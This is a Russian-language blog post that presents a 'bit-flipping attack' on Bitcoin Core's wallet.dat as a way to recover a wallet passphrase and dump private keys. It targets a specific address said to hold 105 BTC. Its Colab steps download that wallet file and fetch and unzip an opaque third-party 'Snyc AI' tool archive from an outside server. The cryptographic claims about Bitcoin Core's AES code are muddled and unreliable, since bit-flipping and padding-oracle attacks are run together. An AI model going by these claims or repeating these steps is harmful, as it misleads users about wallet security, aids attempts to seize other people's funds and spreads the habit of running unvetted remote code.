  18. What vulnerabilities in CoinDCX’s internal system allowed crypto hackers to withdraw $44 million

  19. Wave of Large-Scale Cyberattacks on Crypto Exchanges in 2025: Over $3 Billion Stolen, WOO X and Other Platforms in Crypto Hackers’ Crosshairs

  20. UPCX Payment Platform Hack: Unauthorized Withdrawal of $70 Million from Administrative Accounts While Maintaining Security of Users’ Assets

  21. PeckShield: Large-Scale Crypto Hacks in Q1 2025 — Largest Exploits and Record Losses in the Crypto Market Crypto Hacks in Q1 2025: Damages Exceed $1.6 Billion, 131% Growth, and Major Attacks on Bybit and DeFi Protocols

  22. Cryptocurrency losses from crypto exploits and fraud in March 2025 fell sharply to $28.8 million on the back of major incidents and successful refunds

  23. From $1,500 to $468 million: The awakening of the Bitcoin whale amid massive thefts, lightning-fast laundering and new laws and whether it can be called the awakening of the ancient Bitcoin whale and the challenges of super-fast laundering of cryptocurrencies in a new era of regulation

  24. The «Demonic» vulnerability (CVE-2022-32969) can facilitate the theft of BTC coins of the Bitcoin cryptocurrency

  25. Sophisticated Phishing Attack: Crypto Owner Loses $908K After 15 Months of Waiting — Security Lessons for All Ethereum Users

  26. Main Hacking Attack Methods and New Smart Contract Vulnerabilities in the Crypto Industry in 2025: Social Engineering, Phishing, and Off-Chain Attacks as the Main Security Threats

  27. Merkle Trees and Cross-Chain Bridges: How Verification Errors Create Loopholes for Fake Crypto Assets

  28. Rugproof Solana Launchpad Accused of Scam, Rug-Pulling Scheme by Bubblemaps Amid Memcoin Market Rise

  29. Modern Cybersecurity Threats: Trojans, Backdoors, and Infostealers as Ancient Bitcoin Whale Awakens

  30. How Dust Attack Reveals Bitcoin Private Keys: A Scientific Analysis of ECDSA Vulnerabilities and Cryptanalysis Methods


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост
  • Опубликованы две части [№1] , [№2] исследования


Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.


Crypto Tools

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/3uCsL_zxKPI

Video tutorial: https://dzen.ru/video/watch/68baca013761775f268041dc

Источник: https://cryptodeeptool.ru/bit-flipping-attack-on-wallet-dat


Показать полностью 14 1
[моё] Биткоины Криптовалюта Трейдинг Финансовая грамотность Арбитраж криптовалюты Заработок в интернете Заработок Пассивный доход Инвестиции в акции Стартап Ключевая ставка Дивиденды Доллары Биржа Аналитика Кризис Онлайн-курсы Видео YouTube Гифка Длиннопост
0
2
LineTrand
LineTrand
19 часов назад
Лига Криптовалют
Серия Криптовалюта

BTC/USDT 22:13 пятница, 5 сентября 2025г (GMT+3 Москва)⁠⁠

BTC/USDT 22:13 пятница, 5 сентября 2025г (GMT+3 Москва) Опрос, Криптовалюта, Биткоины, Usdt

Недельный график

BTC/USDT 22:13 пятница, 5 сентября 2025г (GMT+3 Москва) Опрос, Криптовалюта, Биткоины, Usdt

4х часовой график

Если сравнивать с прошлим циклом, то расти BTC осталось еще 240% и на это есть около 90 дней +/-. Цена может подняться до 229 382 тясячи долларов.

Вы верите в рост BTC до 229 382$?
Всего голосов:
Показать полностью 2 1
Опрос Криптовалюта Биткоины Usdt
0
1
CryptoDeepTech
CryptoDeepTech
19 часов назад

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1]⁠⁠

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В программе Bitcoin Core для защиты пароля кошелька используется симметричный криптографический алгоритм AES-256-CBC. Этот алгоритм применяется для шифрования файла кошелька (wallet.dat), где хранятся закрытые ключи пользователя. Степень защиты обеспечивается 256-битным ключом, который создается из пароля пользователя. Также для генерации ключей Bitcoin Core использует криптографию на основе эллиптических кривых, а именно кривую secp256k1, которая лежит в основе создания публичных и приватных ключей транзакций.

AES-256-CBC и не хранит пароль напрямую, а использует его для генерации ключа шифрования. Однако в исследовании отмечается, что в реализации Bitcoin Core отсутствует смена ключа шифрования закрытых ключей, что может снижать защиту при повторном использовании пароля.

AES-256-CBC (Advanced Encryption Standard с длиной ключа 256 бит в режиме сцепления блоков — CBC, Cipher Block Chaining) — один из наиболее распространённых алгоритмов симметричного шифрования для защиты информации.

Принято считать, что AES-256-CBC при определенных комбинациях уязвима к различным атакам. Разберём основной вид атаки такие как Bit-flipping attack , которые применимы к AES-256-CBC.

При Bit-flipping attack AES-256-CBC не обеспечивает контроль целостности, что делает возможным модификацию шифротекста для контролируемого изменения расшифрованных данных. Это применимо, например, при реализации авторизации, где взломщик может изменить права доступа или другие параметры, просто изменив определённые биты в шифротексте


Как Bit-flipping Attack влияет на безопасность кошелька Bitcoin Core

Bit-flipping Attack в основном влияет на режим шифрования CBC (Cipher Block Chaining) и работает за счёт уязвимости режима к контролируемому изменению битов в зашифрованном сообщении. В CBC каждый блок шифротекста зависит от предыдущего блока и плейнтекста через операцию XOR, поэтому изменение одного бита в зашифрованном блоке приводит к предсказуемому изменению соответствующих битов в расшифрованном тексте следующего блока.



Процесс работы Bit-flipping Attack:

  • При расшифровке блока шифротекста Ci происходит операция XOR с предыдущим блоком шифротекста Ci-1, чтобы получить исходный текст Pi.

  • Если атакующий изменит один или несколько битов в блоке Ci-1, то при расшифровке изменится соответствующий бит в блоке Pi, управляемый изменениями в Ci-1.

  • При этом блок Ci после изменений становится некорректным и при расшифровке будет повреждён, но изменение в предыдущем блоке позволяет повреждать (манипулировать) расшифрованным текстом управляемым образом в следующем блоке.

Это манипулятивная расшифровка влияет на безопасность криптографического алгоритма AES-256-CBC которую использует кошелек Bitcoin Core:

  • Такая манипуляция позволяет злоумышленнику в некоторых случаях менять расшифрованные данные без знания ключа, например, изменять параметры доступа, права или другие данные, если не применяется отдельный механизм аутентификации и проверки целостности.

  • Битфлип-атака на CBC демонстрирует его «модифицируемость» (malleability), то есть отсутствие встроенной защиты целостности данных.

  • В реальных системах атака эффективна, если нет дополнительной защиты — такой как HMAC или использование AEAD режимов (например, AES-GCM), которые обеспечивают аутентификацию и предотвращают изменение данных без обнаружения.

Опасность неиспользования проверки целостности данных вместе с режимом AES-256-CBC связана с тем, что CBC сам по себе не обеспечивает защиту от модификации зашифрованного сообщения. Это делает возможными битфлип-атаки, при которых злоумышленник может контролируемо изменить зашифрованные данные без знания ключа.


Важно отметить что атакующий перебирает байты, контролируя изменения в шифротексте и анализируя ответы системы, постепенно восстанавливая оригинальный пароль в бинарном виде, особым образом изменяя блоки.

В итоге, восстановив пароль, злоумышленник может разблокировать кошелёк через команду Bitcoin Core walletpassphrase и получить приватные ключи командой dumpprivkey.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://en.wikipedia.org/wiki/Bit-flipping_attack


AES256CBCEncrypt и AES256CBCDecrypt для работы в режиме CBC (Cipher Block Chaining)

Функция файла aes.cpp в кошельке Bitcoin Core — обеспечение криптографического шифрования и дешифрования данных с использованием алгоритма AES-256, также функция файла aes.cpp реализует классы AES256Encrypt и AES256Decrypt для блочного шифрования/дешифрования данных размером 16 байт по алгоритму AES-256. Исходный код выполняет основные задачи инициализация контекста шифрования/дешифрования с заданным приватным ключом. Наши наблюдение в процессе криптоанализа выявили нарушение в работе режима CBC (Cipher Block Chaining): где применение XOR к каждому блоку с предыдущим (или IV для первого блока), определяет слабую криптостойкость к общему стандарту AES к которому злоумышленник может применить Bit-flipping Attack. Данная криптографическая уязвимость связана с неправильным использованием вектора инициализации (IV) в режиме CBC (Cipher Block Chaining).


В коде функции CBCEncrypt (в строке №57):

memcpy(mixed, iv, AES_BLOCKSIZE);


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L57


IV копируется в локальный массив mixed и далее используется для XOR с первым блоком данных. Однако IV передается в конструктор AES256CBCEncrypt и копируется один раз в поле класса iv (в строке №121):



Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L121


В CBC режиме шифрования IV должен быть либо случайным, либо уникальным и не повторяться для разных сообщений с одним ключом, чтобы обеспечить безопасность. Если IV фиксирован и не меняется, это открывает уязвимость — повторяющаяся структура позволит злоумышленнику провести атаки по выявлению закономерностей в зашифрованных данных, где хранятся секретные данные как пароли и приватные ключи кошелька Bitcoin Core.



Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L70


Bit-flipping attack на файл wallet.dat реализован через XOR с числом паддинга, что отличается от стандарта PKCS#7, где паддинг просто добавляется как отдельные байты. Такой XOR-подход не является безопасным и может привести к неверному шифрованию и потенциальным уязвимостям при расшифровке. Также в функции CBCDecrypt проверка и удаление паддинга реализована нестандартно и может быть уязвимой к таким типам атаки как: Bit-flipping attack & Padding oracle attack



Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L106


Практическая часть

Перейдем к практической части из теории нам известна уязвимость с помощью которого можно реализовать Bit-flipping attack на файл wallet.dat , так как уязвимость возникает из-за использования фиксированного IV и нестандартной реализации паддинга в функциях CBCEncrypt и CBCDecrypt. Эти моменты критичны для безопасности режима CBC (Cipher Block Chaining) и могут быть истолкованы как «в строке с memcpy(mixed, iv, AES_BLOCKSIZE);» в функции CBCEncrypt и в блоке обработки паддинга.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Рассмотрим пример с использованием Bitcoin-кошелька по адресу: 16A5RFckRNW6fZzfjCGSneD3PApACLRwix. В данном кошельке были утеряны монеты на сумму 105.68557389 BTC, что на август 2025 года эквивалентно примерно 12,134,500 USD.

Для демонстрации атаки в ознакомительных целях используем инструменты и среды, такие как Jupyter Notebook или Google Colab. Сначала загружаем зашифрованный файл wallet.dat, содержащий информацию кошелька. Далее пошагово изменяем отдельные биты в блоках шифротекста и отправляем модифицированные версии системе для анализа её реакции.

Этот метод атаки, известный как Bit-flipping attack в контексте wallet.dat , представляет собой не просто случайное изменение данных, а сложный поэтапный процесс, при котором отбираются корректные изменения с учётом реакции системы на правильность паддинга (выравнивания) при расшифровке данных с использованием AES-256-CBC.

Используя такую стратегию, инструменты строят бинарное значение пароля, что в итоге позволяет получить пароль для расшифровки wallet.dat и доступ к Bitcoin Core без знания первоначального ключа шифрования. Эта атака основана на использовании уязвимости, называемой Padding Oracle Attack, которая эксплуатирует информацию об ошибках выравнивания при дешифровке, предоставляемую системой.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

16A5RFckRNW6fZzfjCGSneD3PApACLRwix


Основные инструменты и команды, применяемые для таких атак:

Google Colab (Colaboratory) — это облачная платформа, предоставляющая интерактивные Jupyter-ноутбуки, где можно писать и запускать код для различных языков программирование. Он особенно полезен для анализа данных, машинного обучения и работы с Snyc AI, так как предоставляет бесплатный доступ к мощным вычислительным ресурсам, таким как GPU и TPU. Важным преимуществом является возможность выполнять системные команды, как в обычном терминале Linux, через ячейки с префиксом ! для интеграции с внешними утилитами и скриптами.


Google Colab

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://colab.research.google.com/drive/1tCCSUtjl6seE9lqkFLcLodE96mj5uuHR


Bitcoin Core и установка bitcoind & bitcoin-cli

Обновление списков пакетов и установка системных зависимостей

!apt-get update
!apt-get install -y software-properties-common

Примечание:

  • Первая команда обновляет локальный индекс доступных пакетов и их версий в системе Ubuntu, чтобы обеспечить актуальность данных при установке программ.

  • Вторая команда устанавливает пакет software-properties-common, который предоставляет инструменты управления дополнительными репозиториями и зависимостями.

  • C научным пониманием это подготовительный этап типичен при работе в любой Linux-среде, включая виртуальные. Обновление списков пакетов обеспечивает, что последующая установка программ будет использовать последние стабильные версии и зависимости, что важно для безопасности и совместимости ПО.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Добавление репозитория Bitcoin Core и установка bitcoind (вместе с bitcoin-cli)

Альтернативный способ: загрузка и распаковка бинарных файлов Bitcoin Core из архива

!wget https://bitcoin.org/bin/bitcoin-core-0.18.0/bitcoin-0.18.0-x...
!tar -xzf bitcoin-0.18.0-x86_64-linux-gnu.tar.gz

Примечание:

  • add-apt-repository добавляет официальный PPA (Personal Package Archive) Bitcoin Core в систему — источник актуальных пакетов Bitcoin.

  • После обновления индекса пакетов система устанавливает пакет bitcoind, который включает в себя демона биткоина (Bitcoin server) и клиентскую утилиту bitcoin-cli.

  • Загружает архив с предсобранными бинарными файлами Bitcoin Core указанной версии.

  • Распаковывает архив, извлекая байтовые файлы, включая bitcoind и bitcoin-cli.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

С научной понимании Bitcoind — это полнофункциональный узел Bitcoin с серверной частью, который валидирует транзакции и блоки, поддерживает сеть и хранит блокчейн локально. bitcoin-cli — клиентский инструмент для взаимодействия с демоном через JSON-RPC интерфейс, управляя кошельками, транзакциями и запросами к блокчейну. Установка из PPA гарантирует корректную интеграцию и обновления. Такой способ позволяет получить необходимое программное обеспечение без зависимости от системных репозиториев, что бывает важно, если требуется определённая версия или если PPA недоступен в текущей среде. Это классический метод распространения программного обеспечения с гарантированным контролем версии и среды.


Команда cd переключается в директорию с бинарными файлами.

Выполнения команды — смена текущей рабочей директории на /content/bitcoin-0.18.0/bin, что подтверждается выводом пути.

cd bitcoin-0.18.0/bin/

Описание и действие:

  • Команда cd (от английского «change directory» — сменить директорию) используется в операционных системах семейства Unix/Linux и в средах терминала, таких как Google Colab, для перехода из текущей рабочей директории в указанную директорию. В данном случае команда меняет текущую папку на директорию bin, которая находится внутри каталога bitcoin-0.18.0. Это позволяет перейти в папку, где, вероятно, находятся исполняемые файлы или скрипты, связанные с программным обеспечением Bitcoin версии 0.18.0.

  • В контексте операционных систем, терминал или командная строка — это интерфейс, через который пользователь взаимодействует с системой, вводя текстовые команды. Текущая рабочая директория — это та папка в файловой системе, в рамках которой по умолчанию выполняются все команды, если не указано иное.

  • Команда cd позволяет изменять эту рабочую директорию, что необходимо для организации удобного доступа к нужным файлам и папкам.

  • Путь bitcoin-0.18.0/bin/ может быть как относительным (от текущего каталога), так и абсолютным (начинающимся с корня /). В Google Colab корневая директория по умолчанию — /content/, и при работе с проектами часто структура каталогов отражает вложенность программного обеспечения или данных.

  • Перемещение в директорию bin обычно связано с необходимостью получения доступа к бинарным файлам (исполняемым программам), которые расположены в этом каталоге. Это позволяет выполнять команды или скрипты, входящие в состав программного продукта, например, запускающих узлы биткоина, тестирующих сеть или работающих с кошельками.

  • Таким образом, выполнение команды cd bitcoin-0.18.0/bin/ задаёт контекст выполнения для дальнейшей работы с компонентами Bitcoin Core 0.18.0 внутри Google Colab.


Проверка установки bitcoin-cli

!./bitcoin-cli --version

Описание:

  • Запускает команду bitcoin-cli из локальной директории для проверки работоспособности и версии утилиты. При правильном выполнении выведет строку с информацией о версии клиента.

  • Запуск бинарных файлов из локальной директории — стандартная практика при ручной установке ПО. В Colab и других облачных средах это удобно для использования специфичных версий без системной установки.

  • Контроль версии важен для совместимости с сетевым протоколом и ожидаемой функциональностью, а также для отладки при возникновении ошибок.


Результат:

Bitcoin Core RPC client version v0.18.0


Результат выводит версию установленной утилиты bitcoin-cli, проверяя успешность установки и доступность команды для вызова.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Загрузка файлов wallet.dat & aes.cpp

Запустим команду для загрузки файла wallet.dat

!wget https://github.com/keyhunters/Biggest-Lost-Bitcoin-Wallets-List/raw/refs/heads/main/105.68 BTC/wallet.dat

Описание и действие:

  • Команда wget служит для скачивания файлов из интернета по протоколу HTTPS.

  • Здесь мы загружаем файл wallet.dat – это бинарный файл, хранящий зашифрованные приватные ключи, адреса и другую критически важную информацию Bitcoin Core кошелька.

  • Файл wallet.dat зашифрован с использованием стандарта AES-256-CBC, где приватные ключи защищены с помощью мастер-ключа и пароля.

  • Такой файл используется для управления и хранения средств в Bitcoin. В ходе научного исследования и атак, например padding oracle, этот файл анализируется и модифицируется для восстановления утерянных паролей или ключей.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В научное понимание файл wallet.dat играет роль защищённого контейнера для криптографических ключей, и его целостность и конфиденциальность обеспечиваются алгоритмами шифрования, основанными на AES. Загрузка файла позволяет работать с реальными данными кошелька, что необходимо для исследований уязвимостей и тестирования методов криптоанализа, например, подобных атакам на padding oracle.


Запустим команду для загрузки файла алгоритма aes.cpp

!wget https://github.com/keyhunters/bitcoin/raw/refs/heads/master/...

Описание и действие:

  • Команда загружает исходный файл aes.cpp, содержащий исходный код реализации AES алгоритма шифрования, используемый в Bitcoin Core.

  • Этот файл важен для понимания того, как именно происходит шифрование и дешифровка данных в wallet.dat.

  • Исходный код помогает исследователям понять логику применения AES-256-CBC, применение выравнивания (padding), фиксирование ошибок и особенности реализации криптоалгоритмов.

  • Такой код можно использовать в Jupyter Notebook или Google Colab для написания собственных скриптов дешифровки или моделирования атак.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В научное понимание криптоанализ исходного кода AES алгоритма позволяет глубоко понять принципы работы симметричного шифрования в Bitcoin Core, особенности режима CBC (Cipher Block Chaining), важность корректного паддинга и потенциальные уязвимости, которые могут использоваться при атаке padding oracle. Это способствует более научно обоснованной разработке методов восстановления паролей и ключей.


Общие научные сведения по контексту:

  • AES-256-CBC: Способ симметричного блочного шифрования, где применяются операции XOR с предыдущим зашифрованным блоком (CBC — Cipher Block Chaining) для повышения безопасности. Паддинг (выравнивание) данных на последнем блоке обеспечивает корректную длину входа.

  • wallet.dat: Хранит зашифрованные приватные ключи и метаданные. Пароль пользователя используется для генерации ключа шифрования мастер-ключа с помощью функции, как EVP_BytesToKey OpenSSL, что увеличивает стойкость шифра.

  • Padding Oracle Attack: Хакерская атака, эксплуатирующая наличие подробных сообщений об ошибках при неверном паддинге, что постепенно позволяет взломать ключ шифрования.

  • Анализ исходного кода aes.cpp: Ключ для понимания реализации шифра и корректного построения атак, изучения уязвимостей и разработки средств их предотвращения.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запуск биткоин-демона bitcoind с указанием кошелька

!./bitcoind -daemon -wallet=/content/bitcoin-0.18.0/bin/wallet.dat

Запускаем биткоин-демон в фоновом режиме (-daemon) и указывает использовать конкретный файл кошелька wallet.dat, расположенный в указанном пути. Bitcoind — основной компонент для взаимодействия с сетью Bitcoin. Демон обрабатывает все сетевые операции, хранит полный локальный блокчейн и управляет кошельком. Запуск с указанием файла wallet.dat позволяет работать с конкретным зашифрованным кошельком (ключами и адресами), что важно для анализа состояния и управления средствами.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

  • Запуск демона Bitcoin Core (bitcoind) в фоновом режиме. Демон — это серверная часть программного обеспечения Bitcoin Core, которая синхронизируется с сетью Биткоин, загружает блокчейн, обрабатывает транзакции и поддерживает работу узла в сети. Ключ -daemon означает, что процесс запустится в фоновом режиме и не будет блокировать консоль, позволяя вам продолжать работу в терминале.

  • Результат в терминале обычно минимальный — команда запускается, и управление сразу возвращается пользователю, без дополнительных сообщений. Логи и процессы работы демона будут записываться в системные логи или в файлы логов Bitcoin Core в каталоге данных (обычно ~/.bitcoin). Если запуск удался, процесс bitcoind будет активен в фоне и поддерживать сетевое взаимодействие с другими узлами блокчейна.

  • Научное понимание: запуск демона bitcoind является ключевым этапом в работе полноценного узла (full node) сети Биткоин. Узел обеспечивает децентрализованность и безопасность сети, проверяя все транзакции и блоки с использованием криптографических алгоритмов и протоколов консенсуса. Фоновый режим позволяет узлу непрерывно поддерживать актуальное состояние блокчейна, выполнять валидацию данных и откликаться на запросы через JSON-RPC интерфейс для взаимодействия с другими программами и пользователем.

  • ./bitcoind — запускает исполняемый файл демона bitcoind из текущего каталога (использование ./ указывает, что файл находится в текущей директории).

  • -daemon — параметр запуска, переводящий процесс в фоновый режим (демон) без блокировки терминала.

Команда ./bitcoind -daemon позволяет развернуть работающий Bitcoin узел, поддерживающий сеть, с автоматической синхронизацией данных и откликом на RPC-запросы, что является фундаментом для работы с криптовалютой на локальной машине Google Colab.


Данный набор команд в Google Colab предоставляет полный цикл установки и запуска инструментов Bitcoin Core (bitcoin-cli и bitcoind), необходимых для управления криптовалютой и проведения исследований (в том числе атак или восстановления доступа), в условиях облачной вычислительной среды. Основываясь на этих шагах, исследователь получает программный интерфейс для взаимодействия с сетью и локальным wallet.dat через RPC команды, что критично для научных и практических задач в криптографии и блокчейне.


Инструмент для криптоанализа Snyc AI


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Загрузка и установка инструмента Snyc AI

Подробное описание всех команд и действий терминала

Команды:

!wget https://snyc.ru/repositories/neuralnet_tools.zip

Команда wget — это мощная консольная утилита для загрузки файлов из сети через протоколы HTTP, HTTPS и FTP. Здесь она используется для загрузки архива neuralnet_tools.zip с сервера по указанному URL. Команда wget работает в неинтерактивном режиме, что позволяет скачивать файлы без участия пользователя, включая возможность возобновления прерванных загрузок. Это особенно важно при работе с большими файлами или нестабильным интернет-соединением. Его кроссплатформенность и простота делают wget незаменимым инструментом для автоматизации и управления загрузками в научных вычислениях и обработки данных.


Эта команда извлекает все файлы из neuralnet_tools.zip:

!unzip neuralnet_tools.zip

Команда unzip распаковывает содержимое ZIP-архива в текущую рабочую директорию. Формат ZIP широко используется для сжатия и архивирования данных без потерь, что помогает экономить дисковое пространство и облегчать передачу больших наборов файлов. Распаковка архива позволяет получить доступ к инструментам и скриптам, которые находятся внутри, для дальнейшего использования в задачах анализа или декодирования. Этот этап — стандартная процедура при подготовке программного обеспечения к использованию в средах разработки и исследовательских проектах.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запустим команду ls для быстрого и удобного просмотра:

ls

Команда ls выводит список файлов и папок в текущей директории. Эта базовая Unix-команда служит для проверки содержимого каталога, помогая убедиться в успешной загрузке и распаковке архива. В контексте научных исследований или программирования она облегчает навигацию по файловой системе и подтверждение наличия нужных данных или инструментов.


